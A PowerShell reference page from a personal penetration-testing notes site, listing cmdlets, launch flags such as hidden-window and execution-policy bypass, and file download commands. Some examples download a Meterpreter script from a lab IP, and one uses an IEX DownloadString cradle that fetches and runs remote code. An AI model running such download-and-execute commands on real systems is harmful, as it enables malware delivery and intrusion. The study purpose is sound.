πŸ•ΈοΈ
Th4ntis CyberSec
  • πŸ•·οΈ>whoami_
  • πŸ–₯️General Info
    • CyberSec News
    • Getting Started and other Resources
      • CompTIA Certs
        • Security+
        • Pentest+
    • MITRE ATT&CK
    • Cyber Kill Chain
    • Docker
  • πŸ’»Networking
    • General Networking
    • Common Ports and Protocols
    • TCP/IP Model
    • OSI Model
    • Subnetting
    • Wireshark
    • NMap
    • Wireless
      • Wardriving/WiFi Sniffing
    • 3-Way Handshake
  • 🐧Linux
    • Common commands
    • Sudo
    • Files and File contents
    • Sed Awk and Grep
    • Permissions
  • πŸͺŸWindows
    • Event Codes
    • Powershell
    • Internals
    • Active Directory
  • πŸ”ŽOSINT
    • OSINT Tools
    • IP/Domain OSINT
    • Email/Username OSINT
    • URL OSINT and Sandboxing
    • Social Media OSINT
    • Website OSINT
    • Password OSINT
    • Physical Location OSINT
    • Image OSINT
    • People OSINT
    • Phone Number OSINT
    • Shodan
    • Google Dorking
  • πŸ› οΈTools
    • Brute Force
      • Hydra
    • Credential Dumping
      • Mimikatz
    • Enumeration
      • Bloodhound
      • Certipy
      • Dirb/Dirbuster
      • Enum4Linux
      • GoBuster
    • Exploitation Framework
      • Metasploit
      • Sliver
      • Cobalt Strike
    • Hash Cracking
      • Hashcat
      • JohnTheRipper
    • Methods
      • Powershell Obfuscation
      • Privilege Escalation
      • Pass-The-Hash
      • Kerberos and Kerberoasting
    • Vulnerability Scanners
      • Nessus
      • OpenVAS
    • Web App
      • BurpSuite
      • OWASP Zap
    • Wireless
      • Aircrack-ng
      • Kismet
      • Bettercap
      • HCXDumptool
      • Wifite
    • Impacket
    • Social-Engineer Toolkit (SET)
  • πŸ“”Guides and How-To's
    • Lab Setup
      • Ubuntu VM
      • Kali VM
      • Windows User VM
      • Windows Server VM
    • Wardriving
      • Pwnagotchi
    • Wireless Pentesting
      • WiFi Pineapple Basics
      • Evil-Twin Attack
    • Over The Wire
      • Bandit
      • Natas
      • Leviathan
      • Krypton
      • Narnia
      • Behemoth
      • Utumno
      • Maze
      • Vortex
      • Manpage
    • Docker and Kali Linux
    • Staying Private and goin Dark Online
  • πŸ“•Quick References
    • Tools
      • Tmux
      • NMap
      • Ffuf
      • NetExec
      • CrackMapExec
      • Proxychains
      • OneDriveUser Enum
      • Hashcat
    • One-liners
    • Reverse Shells
    • Post Exploitation
    • Enumeration
      • Google
      • Sublist3r
      • NMap
      • DNSDumpster
    • Hashcracking
    • Wireless
  • πŸ““Courses
    • PNPT
      • Practical Ethical Hacking
      • Windows Privilege Escalation
      • Linux Privilege Escalation
      • OSINT Fundamentals
      • External Pentest Playbook
  • ☁️TryHackMe
    • Attacking Kerberos
    • Hacking with Powershell
    • Powershell for Pentesters
    • Linux PrivEsc
    • Windows PrivEsc
    • Blue
    • Kenobi
  • πŸ“¦HackTheBox
    • Starting Point
      • Tier 0
        • Meow
        • Fawn
        • Dancing
        • Redeemer
        • Explosion
        • Preignition
        • Mongod
        • Synced
      • Tier 1
        • Appointment
        • Sequel
        • Crocodile
        • Responder
        • Three
        • Ignition
        • Bike
        • Funnel
        • Pennyworth
        • Tactics
      • Tier 2
        • Archetype
        • Oopsie
        • Vaccine
        • Unified
        • Included
        • Markup
        • Base
    • Walkthroughs
      • Lame
      • Analytics
      • Manager
      • Codify
Powered by GitBook
On this page
  • Commands
  • Arguments
  • Cmdlet
  • Commands
  • Arguments
  • Download files
  • Additional resources
Edit on GitHub
  1. Windows

Powershell

Last updated 1 year ago

In short, "PowerShell is a cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework. PowerShell runs on Windows, Linux, and macOS." There is a comprehensive document , on Microsoft website.

There is also a brief course.

Microsoft has a free course on Introduction to Powershell on their website. Information on .

We can run powershell from the Start Menu by searching for it, through the command prompt by running powershell.exe, or through the run dialogbox(windows key+r) and running powershell.exe

Commands

  • IEX OR Invoke Expression

    • The Invoke-Expression cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command. Without Invoke-Expression, a string submitted at the command line is returned (echoed) unchanged.

Arguments

  • -NoP OR -NoProfile

    • When you launch PowerShell with NoProfile parameter, it ensures to run script in default PowerShell environment and run without any Windows PowerShell profile. Does not load the Windows PowerShell profile.

    • powershell.exe -NoP

  • -NonI OR -NonInteractive

    • Does not present an interactive prompt to the user.

  • -W Hidden OR -WindowStyle Hidden

    • Sets the window style to Normal, Minimized, Maximized or Hidden.

  • -Exec Bypass OR -ExecutionPolicy Bypass

    • Sets the default execution policy for the current session and saves it in the $env:PSExecutionPolicyPreference environment variable. This parameter does not change the Windows PowerShell execution policy that is set in the registry.

  • -Enc OR -EncodedCommand

    • Accepts a base-64-encoded string version of a command. Use this parameter to submit commands to Windows PowerShell that require complex quotation marks or curly braces.

Cmdlet

A cmdlet is a lightweight command that is used in the PowerShell environment. The PowerShell runtime invokes these cmdlets within the context of automation scripts that are provided at the command line. Cmdlets perform an action and typically return a Microsoft .NET object to the next command in the pipeline. A cmdlet is a single command that participates in the pipeline semantics of PowerShell. This includes binary (C#) cmdlets, advanced script functions, CDXML, and Workflows.

A cmdlet is simply a command through which you can perform an action. The two most helpful cmdlets that everyone should be aware of are:

  • Get-Command

  • Get-Help

Using the cmdlet β€˜Get-Command’, you can find all the available cmdlets even if you do not know the exact cmdlet. For example, you want to restart a service from PowerShell, but you do not know the cmdlet. Although you can assume that it may contain the word β€˜service’.

Common verbs:

  • Get

  • Start

  • Stop

  • Read

  • Write

  • New

  • Out

Commands

  • Get-Help shows information about a cmdlet. Get-Help Command-Name

  • Get-Command - Gets all the cmdlets installed on the current Computer. This cmdlet allows for pattern matching such as Get-Command Verb-* or Get-Command *-Noun

  • The Pipe( | ) - Used to pass output from one cmdlet to another. Eg. Verb-Noun | Get-Member

    • Download a file: Invoke-WebRequest -URI http://(IP):(PORT)/(FILE) -Outfile (FILE)

    • Invoke-WebRequest "URL/File" -OutFile "File"

      • Invoke-WebRequest "http://10.0.2.8/meterpreter-64.ps1" -Outfile "meterpreter.ps1"

  • Invoke-Expression - Evaluates or runs a specified string as a command and returns the results of the expression or command. Without Invoke-Expression, a string submitted at the command line is returned (echoed) unchanged.

  • (New-Object System.Net.WebClient)DownloadFile('URL/File', 'Output-File')

    • (New-Object System.Net.WebClient)DownloadFile('http://10.0.2.8/meterpreter-64.ps1', 'meterpreter.ps1')

  • Get-Hotfix - Enumerate already installed patches

    • Get-Hotfix | Format-list | findstr InstalledOn

    • Get-Hotfix | Format-Table HotFixID

  • Format-List - Used to gather more information about objects

    • dir | Format-List

  • Out-File - Used to save the output to a file for further use

    • Get-Hotfix | Out-File Hotfixes.txt

  • Start-Process - Used to start a process, such as notepad.

  • Get-Process - Lists all running processes. Can also be used with the -name parameter to filter for a specific process

  • (command) | Export-Csv - Exports the Previously piped command into a .CSV file that may be easier to read.

  • Get-Content - Shows the contents of a file. Similar to the cat command on linux.

  • Copy-Item - Copies and item

  • Move-Item - Moves and item

  • Get-FileHash - Obtains file hash of specified file

Arguments

  • -NoP OR -NoProfile

    • When you launch PowerShell with NoProfile parameter, it ensures to run script in default PowerShell environment and run without any Windows PowerShell profile. Does not load the Windows PowerShell profile.

    • powershell.exe -NoP

  • -NonI OR -NonInteractive

    • Does not present an interactive prompt to the user.

  • -W Hidden OR -WindowStyle Hidden

    • Sets the window style to Normal, Minimized, Maximized or Hidden.

  • -Exec Bypass OR -ExecutionPolicy Bypass

    • Sets the default execution policy for the current session and saves it in the $env:PSExecutionPolicyPreference environment variable. This parameter does not change the Windows PowerShell execution policy that is set in the registry.

  • -Enc OR -EncodedCommand

    • Accepts a base-64-encoded string version of a command. Use this parameter to submit commands to Windows PowerShell that require complex quotation marks or curly braces.

Download files

  • Invoke-WebRequest http://(IP):(PORT)/(FILE) -Outfile (Outputfile)

    • Invoke-WebRequest -URI http://192.168.1.52:8000/test.txt -Outfile Downloaded.txt

  • "IEX (New-Object Net.WebClient).DownloadString('URL')"

    • IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.52:8000/test.txt')

Additional resources

Full list of approved verbs can be found .

Invoke-Webrequest - Makes a request to a webserver. Sends HTTP and HTTPS requests to a web page or web service. It parses the response and returns collections of links, images, and other significant HTML elements. More info can be found .

πŸͺŸ
here
Introduction to powershell
here
about_Powershell.exe
here
here
TryHackMe Hacking With Powershell
TryHackme Powershell for Pentesters